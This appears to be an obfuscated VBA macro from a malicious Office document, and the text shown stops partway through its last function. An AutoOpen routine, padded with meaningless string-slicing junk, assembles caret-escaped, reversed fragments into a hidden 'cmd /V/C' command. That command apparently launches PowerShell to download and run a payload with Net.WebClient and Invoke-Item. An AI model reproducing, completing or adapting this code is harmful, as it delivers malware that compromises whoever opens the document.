Sub AutoOpen()
   Dim ZBzsz(1)
ZBzsz(0) = MidB(FJuWChwzRQj + IjHQhVAkJAomswdzbphVjsorFHNP + SwsuiKbnrwJ, 122, 685) + MidB(bURorlcjYaYs + dvkEGazfjRQOudwaJfGinsupSTTKSwtO + BcjmwkzYdr, 979, 34) + MidB(ONXQqzJ + kfLQHwRAdZZjvUwCPCqQt + FZdXCPoQzGkUsa, 223, 819) + Left(AbiSCinCHz + PSzMsrXraKkQvNiDcDMHssnWvkzIrG + SWjhTTrzqrSWp, 708)
   Dim MMTiHm(2)
MMTiHm(0) = Mid(qczrbwqrrb + SRftnrptaLNcGQqodhwAkfVacdZGJ + YujZrPzjvfOVl, 199, 198) + MidB(NuzzimR + RMPBEEVOsJOmSzUoAkQSiWtOItpHP + wkQtaKzWRR, 810, 779) + Mid(zdumSChAulf + MUDlucMUPDuZoNwAnhSnvVwjszpfO + mCOjvMOHiZ, 993, 254) + MidB(UBtzztBBE + wsUWZXjKTKkUsVDfcISTYvviQWTkwGQ + ukJCTDKRJR, 482, 100)
MMTiHm(1) = MidB(WZNMHfYvadpPo + MiEvAJuToFHBPiWczLktIRvwKfMD + DwnUJcfb, 120, 478) + MidB(XXjvHMc + CblvdFLocXqzzSSLBVFMH + XSOXzbIHBUBYjW, 379, 819) + MidB(NMaaNEFtQFhzPd + htWQcwiqvwpdoifnPuuEKSFLCaEFYjwoa + TQijiPO, 538, 143) + Mid(BJAivQjoLz + fQrtRupzHKlvQjTpvqwYuEpojFlIEw + TmWzhRbPrYEFfj, 317, 981)
   Dim Ozdrf(2)
Ozdrf(0) = Mid(UiowiDDilVs + dDhusnciNXoclmwwGKujXirbnWK + ViaKPizsLzGYRJ, 102, 350) + MidB(sWuiIjXJQBL + DGdTwKbnzFvKnUlJVrSj + WqmFRzhWrDSnq, 138, 140) + Mid(hXomzwQDwPCTR + dfbUohtBYYTpSiiBfwLAYuWCVi + aRrKKfm, 24, 202) + MidB(POiLakRkAn + RSfDaSfTuVtSzzPioznvmui + EzdPIRasf, 539, 244)
Ozdrf(1) = Right(PCVtltdczll + CdWsIrWOTVQkBWPovJhlZtJ + oGMsGiOzV, 739) + Left(MQvhFnAsGM + jOUUrwzzCZNIYzZuCEhismEUGI + bwzJsKuF, 479) + Left(TIriYjntGh + JBfbincqEszOJPHUVPkOZBDfoTPr + rpHMiLRw, 866) + Mid(QtTPRfzNN + ZnGafHoabNOoXHvNjCYzJIjPWnR + LAQUFIjKI, 356, 40)
   Dim UPQvL(2)
UPQvL(0) = Right(EuGaMCRzXpsKK + GwmLritTliDiKtlnaTpYwmfisVDI + uITIAaH, 204) + Left(vIXnpiEFkr + RYpYLEBhWnbkBZcLGwUcoPspNRwXZ + qvSbODJcmYVvC, 755)
UPQvL(1) = MidB(SkfwGwvBITP + jwNbtKdKLlIzhESTqCfntDjtAQSvoVw + HUJcbRHzXz, 760, 286) + Right(pdNirDLUXJQd + qTcXiiLwjZhXYVEwfJidSFzOnzzLwYOJEW + MXqwnzTfXwTN, 725) + MidB(PXslRfQX + OjzKiRhfvwKmoslUqpZiNzlMlwEwAp + OUVsjlhqWA, 542, 38) + MidB(jLZiXvoElKtFw + AJzHOiRzzIsEiMXjIsXSRTkKiKzapAA + iupOOMcZirFwY, 751, 199)
   Dim tznXZF(2)
tznXZF(0) = Left(VcHbBsK + iLXuktPuCARhKfAdwItQjcwqjWow + SGtbkJEXcWF, 104) + Mid(ScaYuBZCkvrSm + XNBmmPDlYtptrWLaYGvQEGFP + kRXCrFJDTCYOqC, 594, 101)
tznXZF(1) = MidB(LOjQibdZczz + zinobRBClNHHlKQtlzJHOTnvYR + GnUZfCND, 756, 911) + Mid(BbIsqSJiMz + vbZUnWdlBBTRMfhMOviGmK + FIuzISM, 576, 93) + MidB(PQSrQzapbiowD + HMQUmJsRXdOCBEiZjlSvNGMVUaR + VWKANjrjXzvOB, 942, 642) + Right(wOMRLqLHCO + YqFRYhVrDUqsCvApMJfizzZJjwsK + vwIpzdPLw, 365)
GAoJrGUCDZs (KeyString(vbKeyC) + KeyString(vbKeyM) + wbIwLTWw + NqDvA + KdLivVuriTI + cmuXa + IOvrzqKGE + wwJjjhL + SnzRvrRmJk)
   Dim WDnpFA(1)
WDnpFA(0) = Mid(DEzHDmTNE + FljzjIqkSrfsQDasVtihTNopOJYDib + rpFHhOPZYXMiE, 540, 228) + Left(LDOmcPksScbun + cKjlnOLPRlsAFlmzwYZGPZVOOmo + awGtsandzows, 826)
   Dim mjpizb(2)
mjpizb(0) = MidB(CDULRzzcdNASE + tWJhXjcOYCmchJiJzEDpYiCLTfqFimo + otCIZpwJ, 603, 449) + Left(TfrSAwCVHmD + JihwHpsBCuwvdAcFmjzAzmiq + zBqjkQGOMX, 655) + MidB(RkcWESBtCww + KiiKcwGbCtYPLtNsSYQPXPaYljzFtzt + jBujQCPrDG, 859, 86) + MidB(JdXSocSLvCZ + FofSRIUhrYpAASTJhUcAWfFdFUGsJvG + YoawnwS, 98, 663)
mjpizb(1) = MidB(JurmUFsuRMJmM + MkffFtIUvGXoCVWRTKdUXECM + PBNRYlhZDMuAZ, 908, 336) + MidB(DsvpVYvLEiQI + hQijSsGRozkBXiDJWzTwBtcSG + RRcJMkv, 282, 975) + MidB(nbHslXYsTAN + DNTdmpavOWjHrKiEovLspIIFu + CESYGwQ, 356, 532) + Mid(bsMkLdfNKdjIJJ + iUikjmuMSNlLRXsvujEwiZjCXV + POdlwzYN, 785, 954)
   Dim wuuBt(2)
wuuBt(0) = MidB(NOpYoaXzKzkWq + TXijYvWiVjlwkiRhiuZppK + NOEaIvtaXTMhsq, 660, 214) + MidB(pYPjUaFJ + uhsVzzJSuYpFKHjprLOmhVChhudU + ifparkuh, 311, 714)
wuuBt(1) = Mid(zSFYIiWUzzfv + vPbXwZZjXiRkEwJvddwWjczwfJjAuQrpiF + iJPvaGXZXanDC, 335, 227) + MidB(nSmwbtan + UNJPDDovoGBCNaaFVfEOdrnFsHQpI + DMNKkANWWWXl, 308, 470) + Mid(oEHfuQw + QzvoYQfETKMukfkGGGXhWFbkARomN + TCShzGrjwNIou, 385, 536) + Right(iGZQtPZizffnf + iHRcRZjOabTNRhVAEGIWamsz + MsQpIJnCziO, 977)
End Sub

Function wbIwLTWw()
Dim iivnjA(1)
iivnjA(0) = Mid(oftiTwP + TihBSRNdJHWOviWbPQpXnk + lQzSzdBjHAtPN, 647, 165) + Right(whZjOXIcozodH + ubcOdqHsMXKRGNjjpCwGWt + LjNGzGcVmFtdA, 813) + Right(YrNqWaPj + EOwUGVlAwLwXDplbGjwMlhfjB + RhLXBNZRwYrz, 884) + MidB(TTKBlzmSo + BKmaokhuRtABJipOjEiY + WzikfPWc, 920, 231)
   Dim kNRWi(1)
kNRWi(0) = MidB(zXbnZcFnwnv + zlzNViiKZRSvEIKQUCizX + cqTzkOYzWDiQu, 523, 937) + Right(wJUdfnjpcfCCT + niBrpLoDtwaasQpXkOFMwCkJ + WzDRCcPZFcdJ, 108) + MidB(FZJzLpfRikNi + oFBjUXwwXQBPSrIiirdaM + qfYhptzVQXcdk, 58, 674) + MidB(mjJaMKSsEEn + ipjbhTzPWEtBjjOvIAofmSiVGp + JIFtmtJVPkNEK, 102, 626)
   Dim jdhcrE(2)
jdhcrE(0) = MidB(JwICwrZzhulwq + OFfXnkVhmTXLDMSDuDATRtnGdKvOjmIT + jWFoOWjD, 391, 266) + Mid(chBnTXNmOi + sXrFLkCkpGXwpidjNMIhNMvTlFl + Wbvrfis, 687, 209)
jdhcrE(1) = Right(WKdpdojCAFa + pdsPRRiDIVBWqwFVpOCdiGpzWiw + KLCCldStfbNobS, 691) + Left(zfQLOGiaKJbU + MZGMhowTrWXCzOGnllRfjwFXcaUrZW + PVFCJpd, 761) + Left(qEjLDVVVXkvuW + QUsXivBvwzlDpwHdktqQXwWEz + VwpZtUk, 308) + MidB(oIkMRnRfbcRJdK + DVYIrCapimdwbWNVwREFLEYXt + ViwTRPrG, 61, 735)
dwuTT = "d /V/C" + CStr(Chr(5 + 5 + 1 + 3 + 20)) + "^s^" + "e^t ^*`^" + "}^" + "#=^\^-/^ ^\^_" + "/" + "^ /^" + "\-^ " + "^-/^\^ \/" + "^_" + "^ /" + "\_ _/- ^"
Dim bLtEmc(1)
bLtEmc(0) = Mid(EENwWrQcuVBkqU + LFwvtoWKLjLOzlJOGZUTRzN + hBIGadt, 628, 606) + Left(QiCmTHF + kZTjGiqrmfwjFSJudlkFEHwYXhAJuz + IhcAvnCuz, 29) + Right(PZcYiUcq + AZIFTJlWCjRUbSdpzCKknIwEbiZW + jhCsqUsIdzptP, 88) + Left(BifnVfj + zUEJrcKUMoPlzdJBTSstDVdvrJSAwOXs + wlWfYDQGqQfBi, 382)
   Dim kHRij(2)
kHRij(0) = MidB(TIZZqHdaOB + YOSkwaPBXXFPdFEHOWzbNZJuXmvNuscHK + THTvBvDKcM, 39, 468) + Right(fTKiUEKpjsObJK + WvmlvOfjnzPjhVOPZRYpNLdb + alsnIqGlhEQo, 591) + MidB(uvJwWAwvvz + GZZRnDzNMQbXrPvJwlncSUcEjbpzqG + MImdkfiKiTlHHX, 70, 731) + Left(PVoHJwKw + WTkRzPQmXVAHHowjVzJYirWLFwp + MznKiUHsGQOa, 224)
kHRij(1) = MidB(jSNNoBJNSRG + ELnhCOvwTdNNECHoavimlcikCjUtc + ovdhYzLiMpz, 956, 519) + MidB(GiqnphZY + YisMwkkjQGdHCQSzliDnudq + FzOWaczTSRNFP, 562, 843)
   Dim cWoRQ(2)
cWoRQ(0) = MidB(bQZVqwjI + OmBjDiCCFzErWBHtBUOjHuKDicUhFXTO + RZrlOKRCjtX, 189, 667) + MidB(oTXZFtpsbYZl + UCnFdcbcdIiOFKfUuPzRpzkcjQMpZADPqk + cGLpPur, 782, 581) + MidB(DfVRhQHwFszvLQ + OBvZuQotFOjuIvwJJEiWzjmwN + AZvqcniC, 29, 747) + Mid(YbBaEwwBqrHJ + fvpIRbKhFpljIPCSWJuzJiBQb + RlpwHmMt, 403, 298)
cWoRQ(1) = MidB(WMpAQomnYkrdW + jZQLjMwXzOjAcqBDzTYlkcohkhuMaXof + EoiZoql, 635, 759) + Left(wjoiDMMMrfjuiM + BJdnKGwKowwdwDolzGhWKcScZVt + wlkXJWmsm, 793) + Left(OPiubuPua + TmTLrdXdQplwsMiHzsKQOMkhzaiEmFmQkqL + PLCZdRpiv, 299) + Left(ihhFiXzHwZCmkw + vvowDdvLiSuuLWIDXEK + LnSqIPpiY, 681)
OohZzDWKGr = "\^-_^ -^\/ ^_" + "/^" + "\ ^\^" + "_" + "/ -^\" + "^_^ /-" + "^_^ _/\ _" + "-" + "/^ ^\/_^ /^"
Dim PWsiaj(2)
PWsiaj(0) = Mid(ItAUqldVjfvXVA + UHKmbiidDWVZWjrMNFtAJCdGJnzFPfwO + NUZOWQTQDw, 1, 299) + MidB(HvwtAUBj + VqFRGuYVwSzfiiDStwikmzTjEOwXdVztj + JIaiTkL, 279, 303)
PWsiaj(1) = MidB(zCHkUVbFS + OTGzvVXhkwrQqEbazbjpRwQsBcS + jWuGYVppqhjQF, 729, 449) + Mid(tAGrkiCip + dVFSYwjNvzDJlsVcKszljRTB + sciVKMUcRsGEJ, 973, 360) + Right(wFrMZFdplfkVAE + ZDUUjzZXtLjFizTtVHaSXFfYjkHQnJX + wUMzfUTNZXjCjR, 540) + Mid(AawlwPDasmlv + iwEUYIZRnGFwiwATflGIJBFJXmhiSjaA + wDWIjnrfwhH, 82, 847)
   Dim JmomM(2)
JmomM(0) = Mid(SzBiFYmRH + YWbOzZJudYCTuOumOrjdkW + hStjZLm, 368, 927) + MidB(oPcSQPuzijrzdX + astrsrUcbkXzjbSwOGXmOqZXUpVPJ + MbCnCwuArjs, 898, 131) + MidB(ZAPQwuBb + STzmFVNMUAPJLJckVvSVMQVAsFj + XnkdvOmKizuhIK, 824, 73) + Right(JUrJEzzmVj + qdJBrWbjjXZrwYnEGijaqHOikfIsCq + RYHSUcap, 723)
JmomM(1) = Left(SIbJiPFYj + StdorBXtiinHPzULtoRovZ + adzRZCOFNp, 626) + MidB(RGfjjUUulb + XNOAFhOfzBvRIljwdjmbhl + EobpBCNB, 790, 4) + Mid(HSCtUEkS + bkBdRUkljPAVtEIAtwsEbqLjt + BmkVMqnXksQ, 79, 379) + MidB(mIIoLEqO + jjZnGnrdDNNloOUdJLpsTECXEvYLY + dKOjdEZaQcuA, 377, 543)
   Dim iSKJz(2)
iSKJz(0) = Left(ISuwLNTwVZzwzH + majhzhahmBmwSKIXkJnkdVOR + imzKJYiRQCarMC, 486) + Mid(ADPqZRwjzzpC + QMkLzCbmubrHhswkLQpwGIUAbJYt + TKfcrZK, 100, 257)
iSKJz(1) = Left(zSnQqDOimWTCN + iBAdVhcKXMTtjBFJGqj + FKObhAISwouI, 91) + MidB(HWPdtdkVsjmSz + MzSPXKSAUKuVErzfCjaDpGVoW + hKOabwqoNcoWuT, 580, 676) + Mid(BjHAfBomu + BWwFZcEfcuGqEoONLXHYVMohfNlp + fLGrQVqZD, 369, 767) + Mid(RwrmaGKQltz + lvZSJnsrKshWwtmUokXkoaKjrwuSIQ + vAkJANkGEJPd, 937, 331)
   Dim bjDivK(1)
bjDivK(0) = MidB(jDPmhiB + HDEGtfGQRIZDjviEzllTtIAaont + EjMZWkhBwOi, 40, 586) + Mid(UUHchXUjVkKz + RdXXMVXWIUPdYQOcTFUfQ + jwqpLmo, 923, 595)
   Dim bFbAoO(1)
bFbAoO(0) = Mid(LtnwBOGdV + wQUodzfNPpiwhVvnXnKXNJcJoCZY + dUcGQzDIB, 344, 563) + Mid(wOjSSFisKGEHiB + KqRWhLNspXakBXjjOivGSaYSNYwlwPS + LKNmAodvfwq, 780, 682)
TLMnSn = "\^- /-\}_" + "/^\^}_^-\{\_" + "/h/_-c/^\-^" + "t/" + "^-^_^a" + "/" + "_^-c/" + "^" + "_^\^}/^-" + "\^;/^\^-^k^_/" + "^\^a_\/^e^" + "_/\r/^-\b\^"
Dim VDwFcJ(2)
VDwFcJ(0) = Mid(GmXBGztCn + NjCABRQIDzpBpEGNozNrUWaSnQIH + PzDSDvnMBVQQlz, 219, 36) + MidB(OqQLzsidawc + stDKqAnJtJAWraldHlZFhDzLkaUpjJaY + mVADWUhPpIRi, 841, 950)
VDwFcJ(1) = Left(TSwnWHrpDjYUR + CjEqmkVGYROqtGirqIZjKfdLzmvMz + PwnGEGzLaPEtA, 913) + Mid(CVZXIcw + IZWTcLTmiHvQtltwFldPCltqXE + BtvvhaswDkGB, 329, 790) + Right(codLdcoZiJTi + whPrGBVzDSAQUfcfIOjbYJYF + YHJPioZlZ, 660) + Mid(ilLHdMTuC + CaFNGqiwzjfKvkFqZfbrkzPRj + aPNBGpcbSurA, 159, 325)
   Dim AMsin(2)
AMsin(0) = MidB(labiVPrZ + JZRRJouFEmhfTanrOFwlDcbiGHMbVp + rforXzZjCPDvII, 647, 448) + MidB(OnKnNpiJnz + asAUiHDWpIPjoYfapzAaqnERwJNJb + oKuoZZTFmZivD, 479, 337) + Mid(oXCLaSKhipFNT + YsANkhZAVuNBsBtjHEofOskGvkN + tzWKYDRFP, 443, 627) + MidB(RwodwZFt + jMmVAbiQIBuOVqUcFhIOBbmSRn + ZiVmzmiRikGY, 302, 347)
AMsin(1) = Left(SmcwQZEubwkt + McTPVZtiitXqUajwDzfLsWAda + BoEVYiEAwkqkuu, 47) + MidB(kUrzBcKJhRbt + TXtjFTUwwfwmhMlRpdRtzAMtLqMdHb + MANzYOnXMB, 282, 898) + Left(wAlPDBNDtjsZIF + qKspCkDECFiHzlRuMrrYnKJH + wFioKKD, 45) + Mid(LwtKBvivwuads + KwmFftdWnGXtzmhPoYwhWrfNKmi + XRzLRzcwi, 501, 109)
   Dim NMJOK(2)
NMJOK(0) = Mid(wDBtQaZGZZzlj + AwQjiLhmaUdMENWkOtLwqdjJEXTshbiLK + GjRRaZmNiBL, 55, 251) + Mid(TmoHZCuBcOGbw + sDYFINtfmEQFHtUqIrXDXcLip + zpcNIIiHOd, 482, 145) + Right(VmptjuAGFcYVz + wiEcSUOnrwlzGNjkVNBkFITrkzpnI + SuUfjVHwzvz, 68) + MidB(stoAlzm + wTzcdnCLcNVnSOlsurZFSrsFAmW + szVLksdLujVpf, 232, 491)
NMJOK(1) = Right(OtFuBIqOjllh + GkivVttBzQiGmPmfSYcXwrpiwD + dsLPFBQElpNup, 275) + Right(EzuGTGk + MhEjPwzrYClXKlOOpbLiUnazJBYXHKl + LXVsPDRLkH, 625) + MidB(rEQIpvdz + pznpzfikmRRCqjviRWkIBKUGwVpOUcijt + RjGXuXroO, 943, 494) + Right(MdzMvqmff + OwDzaLnqTRzdJzlJVFJZCrcRkCphmH + zTtNCJja, 982)
vdLGz = "-/;^" + "_-^\^X\-/" + "^W/-^_b_-/$-\" + "_^ ^\/_^m^" + "-/^\e\" + "/^_t" + "/^\^_^I^\_/"
Dim tPGkV(1)
tPGkV(0) = Mid(QcvUQtQLNbYzZE + uBurNrhNCaYQcfwhkjWjpwpbKCsBEDP + awhZvhRpUAjh, 378, 546) + Right(VTZKUFsXQWLKZ + MTYViDJbSqUzGtqaikqBOVGK + WHQAoWOuGh, 720) + Right(hrdkuQWfkiNlb + KAbtBCVLaJkfvTusIKklLtltl + PMAwkGF, 849) + Right(LjCQljrkQnmOj + ZOQzPJkmEwjjLNMCwihVZNuJUl + dmoKsps, 909)
   Dim tiMowI(2)
tiMowI(0) = MidB(wEBhRds + mUAPAICTzuAVARVVkCIlQRnLAvVLSwwFa + tWKUzNYi, 955, 272) + MidB(vspkFWhP + wBXciiWBqpIrjwQMiqzPkZTcN + sQOjaIwWipLv, 574, 889) + Left(AJmpFIDPWwmnD + IIAzYtLqTuuWTVOlSTbDijNzJb + TOkCmdww, 875) + MidB(vVLOhsc + YRzlhFWNLBiUJafmTYQscPfiSVjGjw + CRwVhGjmzoZb, 232, 712)
tiMowI(1) = MidB(YVosIZVVCXEsfn + PYYOnwZkpdtoDWhmliLIcvcTKCrHLTr + MUGavDDfjhfwA, 434, 102) + MidB(JZDwvSL + iwVhUwsiUiHPEIwwUJflOFKS + RCvvjVEJwMhGS, 39, 749) + MidB(tVuzwDOKFCMHbK + sCPjMiiEnzCPrdwzHQqTwjkbSsC + AVZzXfl, 201, 754) + MidB(AAzvNZNH + jXBjRCbHPLkaBORibTWGJWwhpOtiuDH + YPFdJDXicZzkCv, 903, 728)
   Dim naAXQS(1)
naAXQS(0) = Right(tWhqXtzutOVp + lrBtwzmwsFFTqwmJWJBz + GmICjQw, 711) + MidB(JVXUWAaXokSaH + PijptjtQrsKdPcGUiAoSmWiiIBjjfM + hSvrFPFjc, 233, 440)
   Dim lwJNK(1)
lwJNK(0) = MidB(cHMRPNAjSk + jAczaQSMZApsSTtOBZTvJnuBjbSQpwTVX + iwsctbS, 375, 785) + Right(GSQLpEoFTJjOik + zwJzvlMScaDArUFEpViGOjSpsCiJrmsS + zzVFzjPBolb, 792)
wXoJKH = "^-_" + "/^\" + "e/^_^-k^-" + "_\" + "o^_-^\v/^-^\n" + "-_/I\^_-^;/-^" + "\)/-\" + "X/^-^\^W^-/\" + "^b_^\^-^$^_"
Dim FDSpCN(2)
FDSpCN(0) = Left(DzMoClQlPLquJ + hWFZKjKqpWSVENOHNLUSddknUoD + EYkSwozJsJWS, 690) + Right(jBziYfoUMEcwav + mCjBzTvTXUUBwwpGSrUvDPDYOUr + CGjPAfwMG, 597)
FDSpCN(1) = Right(KTSODiz + XLRHfltvjzcwGvOktRtLGttvlJK + oYiuRIUuCQZhm, 62) + Right(WATpiru + LNmpIlWLkJinAwZXqdmiTuOJqwJziTvGuh + fDVCtVNWDrPLAR, 482) + Right(XwvucfPbMEUFq + SwwjIRzUjrGzjwNuZOXkJXGajRsR + YsDSpMaZ, 538) + Mid(VfidPqa + JGJwvLCqQDnspIEsuEzIuzhrXwRaSml + jHXiKjJYa, 534, 562)
   Dim ZWwWRo(2)
ZWwWRo(0) = Right(OwNTiuzdVoHpqV + ZCEokUWEBzudvUzoIKLjpKvFnV + ElZzPjXNucJR, 627) + MidB(zaTKAXz + OWPdpPiiOTIDwQGafAtzSF + ULAMEINisUu, 461, 602) + MidB(RSDwwbOzjQZ + VWwYukOWCPAqPMsWlYbhOIzDFNQvfK + WXVdvjESQ, 771, 915) + MidB(BFNidMnu + PuhIIiHkqpCqAEAEUJNtqEIDMBwNT + FiNYvjIEFQJLk, 238, 580)
ZWwWRo(1) = Left(TkYHCBqE + uisbjJivVmjaIWHchqiYquiIiDh + vDOVNpaBGR, 168) + Right(uKQkuZILboM + jBBvroOcWtBurSZZhQAX + IHPITOCLLIZAKZ, 392)
   Dim RoWjA(1)
RoWjA(0) = Right(UJOmclj + wjjzDIHrjiirHAFFjVPIVNoKzPja + qNpncKIjitQISd, 44) + MidB(WjztnhaLlPwH + JBmAtKRsaDrVrNIliNqfBC + cquJYCnHG, 618, 549) + MidB(PsrWqwL + qDqWtsSWkzNvonQiohjGOiSVzILGUfizqT + vpjvfuIa, 99, 879) + MidB(IizrcUro + SNZrtPKnGzimuXTDEQFDzzqjnXVbNi + WVnBsQRnHj, 573, 839)
   Dim dwrGI(1)
dwrGI(0) = Mid(QtTKFlOILfRFB + ZrvYaupazXYwXpYEzcQZziqYQjFFEQpZ + jmuaTTmh, 781, 825) + MidB(GNIZfOwKwu + ZtuSUfiLpNKipGIuzBtZszflacpOo + BZZUNIILht, 849, 948) + Left(IoPiFkVfUBUpu + zwjHKnjjaEjqMjzAowRojSCWEXzYOAbh + pjBbFpZY, 873) + Left(oBUAwpvZOw + RcLajSqNloKHuqjLZWCQVfX + jHjOAYjz, 871)
IzMqU = "\" + "/^ " + "-\/^" + ",^_\^" + "-^P^_/-O" + "-^\^_i^\^-" + "/" + "^$^\-_(_\-^e" + "\/^-l^\^_^-" + "^i/-^\^F-\/^d" + "^_/\a/-^" + "\^o/^-^_^l_^\"
Dim DhBWH(1)
DhBWH(0) = MidB(imvIIbirVSPp + qSjEwLfmvfjsOmGbzqRfutnDmlSJ + oNPSRJSC, 911, 824) + MidB(ZjPFOrQzCDY + KLHtBdVYaDBWopXwcbTEnhWatJG + ciGwKJtNvDzfO, 667, 507)
   Dim bDbzXV(1)
bDbzXV(0) = MidB(UMfCbOTS + KDrNoiNTPUYYwvSiCKrFIPzOLUpfNCoQijO + jDGWhvNjIIjRH, 386, 784) + Right(zWrTBzZpLWJfP + nRIBCsJujiLJOFiqjrXZiDjh + EDtZMdqLmw, 896) + Left(IowoQbGnJRY + PrawWLnVfbJwkOWMQvPkjPPGPlu + ZjNzlociCF, 555) + MidB(BTqsRzBdFMAGq + FYklopMXOkYnMmXuOwPXU + rUXMsvGVdiVr, 487, 991)
   Dim SdjYN(2)
SdjYN(0) = MidB(CNjwUKpAP + wspKWpRjNouzuwtoYYbGUzJwlL + GDWBvQIHqHv, 628, 18) + Mid(lBvUsHbPi + VLNqjGvjhrbtZomzRdufXwqrvW + siJvztzaolRjc, 208, 165)
SdjYN(1) = Right(EVdwAchOfqupPA + DiPUdqsqoJoZDMoqBCprBcjSDFlZk + ZctzRNcfIMT, 862) + Right(dFQTJMANqNr + osEOYkuijuidYWjfhqZzUGariLlfFU + mDwuIuwtLoojo, 561) + MidB(jIFiOtjH + QTwPWKokkchnaujojSuDBzwOGYtTqwPd + vSdrDtEithIniE, 72, 793) + Left(OpXQZwiMqIqqL + ksNoDzIZwPFSpotYPnXis + qCvnCVoW, 968)
   Dim RmPjH(2)
RmPjH(0) = Mid(atDjWQkW + OXBzPDjbwSvPUwTOEpzzRvuwJtBCl + dhSLBjjHIuPK, 480, 95) + Right(BfhRwwN + VEWhzPJmUtADDFNQvkVtBqA + CljUcIf, 589) + Left(LiFPmkNCzbb + owuRzLVwsFsAoZYaAQwmpUjJn + vcwjsXi, 833) + MidB(rjOlAWmwo + DBDnrKEQChCtzcuBpDrHJjhBpwzNz + rbutANi, 899, 312)
RmPjH(1) = Right(hVnYcSAm + MtuGJJOwTphrtGAaunLrwzMNRWiMMV + iAmrEPwwacp, 527) + Left(brFwdqlBvH + zcocVWsbSAnDjviQWJlumGNsKtjEfuIRU + HTiFEbDCPhiGlZ, 964)
JnhjBmYOHs = "-n-^\^_w^\^_" + "/o^\" + "/_" + "D\" + "-/.\/_b" + "^-/\^K^-^_/" + "^f/^_^-$^-" + "/^\^{_/" + "\y\^_" + "/r^\^" + "_/^t\^-^_^{\" + "/-"
wbIwLTWw = dwuTT + OohZzDWKGr + TLMnSn + vdLGz + wXoJKH + IzMqU + JnhjBmYOHs
   Dim AqGQb(1)
AqGQb(0) = Mid(qPWBspzm + MOVGtIGdJDtwrcaAsXwUiruUA + FikslzUtGhAmSH, 331, 484) + Mid(ZSpEEvGQtnP + FaLwKjDFiFGlBkdMQSbkHAiplVDhiHs + GJGsQZuM, 678, 365)
End Function
Function NqDvA()
Dim Vmuzc(1)
Vmuzc(0) = Left(wzwJNIJa + iXvDkaLHpJwYPwROSwzZTEaMj + POFGwTVRkLjBU, 319) + MidB(ahKvrnLEFjzcwK + jTavtSSfwAkjvcJQiYUwbCAAPWtTaz + BqHEIOfzrD, 161, 397)
   Dim mjWwY(1)
mjWwY(0) = Mid(pEzjrRjbXbi + YXDKZKQhYhbBPjWiuQWCLaBwpTo + uZwOdLXNhzRfQ, 90, 796) + MidB(EMuvOzC + jXMbNjQshcRUtKUMTFWvVoOcNtjcwtkbzBG + PXXNkfKMjaBd, 941, 973) + Mid(LPmwHDzAz + IXKTGkXHXwwIEPdSwvnNnlTkaLXWNP + pYHvtZr, 482, 306) + Mid(iurZjVA + VJXhmzwvAbkDDaELjFZzahppimqB + ZjfBaJtdwYocI, 510, 825)
EJDSEQiSNQb = ")^-/^_M-/^\^" + "H/-\C^_/\^$" + "^-^_/ \/" + "_" + "n^_^-/^i/_" + "^\ ^\^-_P\^" + "-/O" + "/" + "-\" + "i/\^_$^" + "_" + "/\(^\"
Dim VnHEW(1)
VnHEW(0) = Left(GSskRJLo + DzZoEUrBfjmmfjwfKuAsjHNQiSqwiYr + RjQSQCqKRUj, 251) + MidB(iAtqlDEth + IjpnMOuEhwucMkPmhDhALvkhFz + CZOHTBXEGl, 649, 937) + MidB(FRiAtWiuJAbi + bjpicJtVNERIKjvVkPTCFDFtHPOjkXf + wzUankEajk, 217, 374) + Mid(iqSzCIiki + mFwYjlfhHWQpqFPcVauCkqRXcUvMVwK + FBCzflFOIZd, 185, 945)
   Dim OKdpr(2)
OKdpr(0) = Right(iPNCNMmAT + aJaTUOooocQoObtwKTUKTnldYtbHFzVWi + qOBCPmRazWlSop, 996) + Right(wSHjikQvMUK + IsSDUETHMFBMmnanRGYQTOHdlHCRHjG + AkVurWmMFTvic, 393) + MidB(EDBkcwp + izJnudjsuaCLvUmDOuMndODfEdQ + IUJWcZLqOmiuWG, 868, 167) + Left(YjuAbaMfZrzcOi + nrlwJiDENZtHHJXYSAIsjKwzUtmXD + TCXioujqC, 273)
OKdpr(1) = MidB(YRhaDimFH + CnNijLLpVWtnHArzlJGijrmSioRQGpDUua + frYiwidZaOrpTz, 469, 392) + MidB(pwwscBEFnwEfvR + iOFEutENsUzbwQjBwlmOXZrrf + TZHfSJOOBwrjzH, 65, 564) + Right(hVdwjOnszii + ZrwBXTRHUnzobRnwiNzARWtts + jjzuSrBG, 607) + Mid(oaAqwrnVEsOiV + rjidaYOzoDAIZmAomrYbYCGWWQRAcGqzU + jSZdLmw, 939, 581)
   Dim sawdP(1)
sawdP(0) = MidB(FGaUBsjXCXnSZ + mDYwsnoZFbDYrEwrkVaOQhwoja + VATnsFQM, 91, 321) + MidB(sboIfwZwhS + LoHRvwFwQEDEEMsCwpFWpsoJl + dDzQbDzwQ, 118, 214)
   Dim LrKjDM(2)
LrKjDM(0) = Mid(ssRCIDjKFcabSJ + PtUFYujpLihbQDIdsOMXwKtCrkc + pSTKrRZ, 962, 246) + Mid(aVFtrYRzaupBD + vfroFjMilztRLTQzOVEzLTTfvIARP + WtGYWHNqT, 930, 938) + Right(lGdqmiY + jjUmERWljiFwpKarNjjOoStofK + PUjMaDkDvUiQ, 346) + Left(wjTPvUo + iRjTKcrBzpiINjKoOCmwOR + MujMaFbi, 166)
LrKjDM(1) = Right(tSdHOUjWn + soKAADrVRBNUjSkOZhipQVluXbiuJocBu + EXqnFPfzwaw, 697) + Mid(GoHtwtfOIUtmGE + iYioUJotalXnTbrCzVIvIvpPVtSIb + wYCjcwATzYIHbo, 874, 38) + MidB(BjhWcZti + ubRKFqXCpUGzBIWAbcrpwZkPa + mwCiZYHwBkQ, 821, 242) + MidB(vhfNFZGQSqClS + bzGMrWDRbkBldKlfiCjMpDjh + XnpNjJTjzHSrQ, 79, 556)
pncfwkQ = "-/h-^_\c-/" + "^_^a^-" + "^\/e" + "\_/r_-/" + "o/^_\^f/^" + "_^" + "-^;/^_^\^'_/" + "\e/-^_" + "x/\^_e^\^-" + "^_^.^-^_^\^" + "'/_^"
Dim vbFilt(2)
vbFilt(0) = Left(jhRsGYDIusYm + pfVjaKiNGBYLdLHJTYbnkSZkKCcR + LlaJBSzHTbP, 394) + Mid(ZzniFLOLNs + BZUKdkVfslwHAiYEAXELMPuMrR + hXkQXnJzfz, 291, 527)
